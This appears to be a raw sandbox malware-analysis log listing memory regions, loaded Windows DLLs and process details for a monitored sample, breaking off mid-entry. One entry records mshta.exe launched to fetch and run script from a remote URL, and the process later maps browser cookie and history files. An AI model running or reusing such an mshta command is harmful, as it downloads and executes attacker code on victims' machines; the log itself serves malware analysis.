os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010989" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 656
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 657
start_va = 0x30000
end_va = 0x12ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 658
start_va = 0x400000
end_va = 0x40cfff
entry_point = 0x400000
region_type = mapped_file
name = "cvtres.exe"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\cvtres.exe" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\cvtres.exe")
Region:
id = 659
start_va = 0x77800000
end_va = 0x779a8fff
entry_point = 0x77800000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 660
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 661
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 662
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
entry_point = 0x7feffb20000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 663
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 664
start_va = 0x7fffffd4000
end_va = 0x7fffffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 665
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 666
start_va = 0x130000
end_va = 0x133fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 667
start_va = 0x140000
end_va = 0x140fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 668
start_va = 0x2f0000
end_va = 0x3effff
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 669
start_va = 0x776e0000
end_va = 0x777fefff
entry_point = 0x776f5ea0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 670
start_va = 0x7fefd9d0000
end_va = 0x7fefda3afff
entry_point = 0x7fefd9d30e0
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 671
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 672
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 673
start_va = 0x150000
end_va = 0x1b6fff
entry_point = 0x150000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 674
start_va = 0x1c0000
end_va = 0x2bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 675
start_va = 0x410000
end_va = 0x50ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 676
start_va = 0x510000
end_va = 0x51ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000510000"
filename = ""
Region:
id = 677
start_va = 0x550000
end_va = 0x55ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000550000"
filename = ""
Region:
id = 678
start_va = 0x75360000
end_va = 0x75428fff
entry_point = 0x75362df0
region_type = mapped_file
name = "msvcr80.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll")
Region:
id = 679
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 680
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 681
start_va = 0x7fefdd50000
end_va = 0x7fefddeefff
entry_point = 0x7fefdd525a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 682
start_va = 0x7fefe640000
end_va = 0x7fefe76cfff
entry_point = 0x7fefe68ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 683
start_va = 0x7feff8c0000
end_va = 0x7feff8defff
entry_point = 0x7feff8c60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 684
start_va = 0x7feff8e0000
end_va = 0x7feff9bafff
entry_point = 0x7feff900760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Thread:
id = 32
os_tid = 0xbbc
Process:
id = "4"
image_name = "mshta.exe"
filename = "c:\\windows\\system32\\mshta.exe"
page_root = "0x3c03b000"
os_pid = "0xbc0"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0x9b0"
cmd_line = "\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0"
cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010989" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 701
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 702
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 703
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 704
start_va = 0x1b0000
end_va = 0x2affff
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 705
start_va = 0x77800000
end_va = 0x779a8fff
entry_point = 0x77800000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 706
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 707
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 708
start_va = 0xff9d0000
end_va = 0xff9dffff
entry_point = 0xff9d0000
region_type = mapped_file
name = "mshta.exe"
filename = "\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")
Region:
id = 709
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
entry_point = 0x7feffb20000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 710
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 711
start_va = 0x7fffffd8000
end_va = 0x7fffffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 712
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 714
start_va = 0x370000
end_va = 0x46ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 715
start_va = 0x776e0000
end_va = 0x777fefff
entry_point = 0x776f5ea0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 716
start_va = 0x7fefd9d0000
end_va = 0x7fefda3afff
entry_point = 0x7fefd9d30e0
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 717
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 718
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 719
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 720
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 721
start_va = 0x7fefdd50000
end_va = 0x7fefddeefff
entry_point = 0x7fefdd525a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 722
start_va = 0x7fefe640000
end_va = 0x7fefe76cfff
entry_point = 0x7fefe68ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 723
start_va = 0x7feff8c0000
end_va = 0x7feff8defff
entry_point = 0x7feff8c60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 724
start_va = 0x7feff8e0000
end_va = 0x7feff9bafff
entry_point = 0x7feff900760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 726
start_va = 0x470000
end_va = 0x56ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 727
start_va = 0x5d0000
end_va = 0x5dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 728
start_va = 0x6d0000
end_va = 0x6dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000006d0000"
filename = ""
Region:
id = 729
start_va = 0x6e0000
end_va = 0x7dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000006e0000"
filename = ""
Region:
id = 761
start_va = 0x7fee0880000
end_va = 0x7fee1117fff
entry_point = 0x7fee08854c0
region_type = mapped_file
name = "mshtml.dll"
filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll")
Region:
id = 784
start_va = 0x779d0000
end_va = 0x779d6fff
entry_point = 0x779d106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 785
start_va = 0x7feff9d0000
end_va = 0x7feffa36fff
entry_point = 0x7feff9db03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 786
start_va = 0x775e0000
end_va = 0x776d9fff
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 787
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 788
start_va = 0x7feffa40000
end_va = 0x7feffb08fff
entry_point = 0x7feffaba874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 789
start_va = 0x7fefe1c0000
end_va = 0x7fefe3c2fff
entry_point = 0x7fefe1e3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 790
start_va = 0x7fefe3d0000
end_va = 0x7fefe547fff
entry_point = 0x7fefe3d10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 791
start_va = 0x7feff5e0000
end_va = 0x7feff709fff
entry_point = 0x7feff5e10d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 792
start_va = 0x7fefe770000
end_va = 0x7fefe7e0fff
entry_point = 0x7fefe781e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 793
start_va = 0x7fefdf60000
end_va = 0x7fefe1b8fff
entry_point = 0x7fefdf61340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 794
start_va = 0x7fefde70000
end_va = 0x7fefdf46fff
entry_point = 0x7fefde73274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 795
start_va = 0x7fefd840000
end_va = 0x7fefd9a6fff
entry_point = 0x7fefd8410c0
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 796
start_va = 0x7fefd7f0000
end_va = 0x7fefd7fefff
entry_point = 0x7fefd7f1020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 797
start_va = 0x7fef6080000
end_va = 0x7fef60bafff
entry_point = 0x7fef6081070
region_type = mapped_file
name = "msls31.dll"
filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll")
Region:
id = 798
start_va = 0x7fefc910000
end_va = 0x7fefc91bfff
entry_point = 0x7fefc911064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 799
start_va = 0xc0000
end_va = 0xe8fff
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 800
start_va = 0x7e0000
end_va = 0x967fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007e0000"
filename = ""
Region:
id = 801
start_va = 0xc0000
end_va = 0xe8fff
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 802
start_va = 0x7fefdb40000
end_va = 0x7fefdb6dfff
entry_point = 0x7fefdb41010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 803
start_va = 0x7feff710000
end_va = 0x7feff818fff
entry_point = 0x7feff711064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 807
start_va = 0x970000
end_va = 0xaf0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000970000"
filename = ""
Region:
id = 808
start_va = 0xb00000
end_va = 0x1efffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b00000"
filename = ""
Region:
id = 809
start_va = 0x20000
end_va = 0x26fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 810
start_va = 0xc0000
end_va = 0xc1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 811
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0xd0000
region_type = mapped_file
name = "mshta.exe.mui"
filename = "\\Windows\\System32\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\mshta.exe.mui")
Region:
id = 820
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 821
start_va = 0xf0000
end_va = 0xf0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 834
start_va = 0x7fefd640000
end_va = 0x7fefd64efff
entry_point = 0x7fefd641010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 837
start_va = 0x20a0000
end_va = 0x219ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000020a0000"
filename = ""
Region:
id = 838
start_va = 0x7fefc740000
end_va = 0x7fefc76cfff
entry_point = 0x7fefc741010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 839
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 840
start_va = 0x7fefe7f0000
end_va = 0x7fefe841fff
entry_point = 0x7fefe7f10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 841
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 842
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 846
start_va = 0x120000
end_va = 0x19cfff
entry_point = 0x120000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 847
start_va = 0x120000
end_va = 0x19cfff
entry_point = 0x12cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 848
start_va = 0x7fefb560000
end_va = 0x7fefb5b5fff
entry_point = 0x7fefb56bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 849
start_va = 0x21a0000
end_va = 0x238ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000021a0000"
filename = ""
Region:
id = 854
start_va = 0x5e0000
end_va = 0x6befff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005e0000"
filename = ""
Region:
id = 855
start_va = 0x7fefb180000
end_va = 0x7fefb197fff
entry_point = 0x7fefb181130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 863
start_va = 0x2390000
end_va = 0x265efff
entry_point = 0x2390000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 864
start_va = 0x2660000
end_va = 0x29a2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002660000"
filename = ""
Region:
id = 865
start_va = 0x7fefd610000
end_va = 0x7fefd634fff
entry_point = 0x7fefd619658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 866
start_va = 0x7fefe850000
end_va = 0x7feff5d7fff
entry_point = 0x7fefe8ccebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 867
start_va = 0x120000
end_va = 0x120fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 868
start_va = 0x7fefd750000
end_va = 0x7fefd75efff
entry_point = 0x7fefd7519b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 869
start_va = 0x130000
end_va = 0x13bfff
entry_point = 0x130000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 870
start_va = 0x140000
end_va = 0x147fff
entry_point = 0x140000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 871
start_va = 0x150000
end_va = 0x15ffff
entry_point = 0x150000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 872
start_va = 0x160000
end_va = 0x19ffff
entry_point = 0x160000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat")
Region:
id = 880
start_va = 0x1a0000
end_va = 0x1a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 881
start_va = 0x7fefe550000
end_va = 0x7fefe5e8fff
entry_point = 0x7fefe551c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 882
start_va = 0x2b0000
end_va = 0x2b0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002b0000"
filename = ""
Region:
id = 886
start_va = 0x2c0000
end_va = 0x2c0fff
entry_point = 0x2c0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 887
start_va = 0x2d0000
end_va = 0x2d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002d0000"
filename = ""
Region:
id = 888
start_va = 0x7fefc060000
end_va = 0x7fefc253fff
entry_point = 0x7fefc1ec924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 889
start_va = 0x2c0000
end_va = 0x2c0fff
entry_point = 0x2c0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 890
start_va = 0x2e0000
end_va = 0x2e1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002e0000"
filename = ""
Region:
id = 896
start_va = 0x2c0000
end_va = 0x2c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002c0000"
filename = ""
Region:
id = 898
start_va = 0x2f0000
end_va = 0x2f1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002f0000"
filename = ""
Region:
id = 899
start_va = 0x7fefe5f0000
end_va = 0x7fefe63cfff
entry_point = 0x7fefe5f1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 900
start_va = 0x7feff9c0000
end_va = 0x7feff9c7fff
entry_point = 0x7feff9c1504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 901
start_va = 0x29b0000
end_va = 0x2bcffff
entry_point = 0x0
region_type = private
name = "private_0x00000000029b0000"
filename = ""
Region:
id = 902
start_va = 0x7fefce60000
end_va = 0x7fefcebafff
entry_point = 0x7fefce66940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 903
start_va = 0x2bd0000
end_va = 0x2dcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002bd0000"
filename = ""
Region:
id = 904
start_va = 0x7fefbde0000
end_va = 0x7fefbe06fff
entry_point = 0x7fefbde98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 905
start_va = 0x7fefbdd0000
end_va = 0x7fefbddafff
entry_point = 0x7fefbdd1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 906
start_va = 0x21d0000
end_va = 0x22cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000021d0000"
filename = ""
Region:
id = 907
start_va = 0x2310000
end_va = 0x238ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002310000"
filename = ""
Region:
id = 908
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 909
start_va = 0x7fef3180000
end_va = 0x7fef31e1fff
entry_point = 0x7fef3181198
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")
Region:
id = 910
start_va = 0x7fef3160000
end_va = 0x7fef317bfff
entry_point = 0x7fef31611a0
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")
Region:
id = 911
start_va = 0x7fefadc0000
end_va = 0x7fefadd0fff
entry_point = 0x7fefadc14c0
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 921
start_va = 0x2a20000
end_va = 0x2b1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a20000"
filename = ""
Region:
id = 922
start_va = 0x2b50000
end_va = 0x2bcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b50000"
filename = ""
Region:
id = 923
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 924
start_va = 0x300000
end_va = 0x300fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 925
start_va = 0x300000
end_va = 0x300fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000300000"
filename = ""
Region:
id = 926
start_va = 0x7fef6630000
end_va = 0x7fef6638fff
entry_point = 0x7fef66314b4
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll")
Region:
id = 927
start_va = 0x2e70000
end_va = 0x2f6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002e70000"
filename = ""
Region:
id = 928
